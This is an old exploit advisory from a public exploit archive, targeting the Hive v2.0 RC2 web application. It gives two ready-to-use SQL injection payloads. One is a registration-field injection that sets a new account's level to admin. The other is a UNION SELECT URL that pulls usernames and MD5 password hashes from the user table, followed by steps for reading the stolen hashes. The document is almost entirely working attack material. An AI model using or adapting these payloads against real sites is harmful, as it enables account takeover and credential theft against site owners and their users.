Hive v2.0 RC2 Remote SQL Injection

-= c0ded by j0j0 =-


you must first create an account, and log in.
then you can send exploit
don't forget to change the action="" URL of this form

 

Username you will use this username to login
Password you will use this password to login
Mail email doesn't have importance
SQL Injection

purpletech', niveau_num=4 WHERE num=2 /* <-- niveau_num is for admin access / num is the member id (default admin id is 2)


 

Now you are admin, logout and re-login with new username/password

There is another one injection :

http://{HOST}/{PATH}/base.php?page=gestion_membre.php&var=profil&user_id=-9999999'/**/UNION/**/SELECT/**/ 0,concat(nick,char(58),pass),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/FROM/**/_user/**/WHERE
/**/{SQL_PREFIX}_user.num={MEMBER_ID}/**//*


Change {HOST}, {PATH}, {SQL_PREFIX} and {MEMBER_ID}
then look at the "Pseudonyme" field, you've got LOGIN:MD5_PASSWORD)

# milw0rm.com [2008-01-11]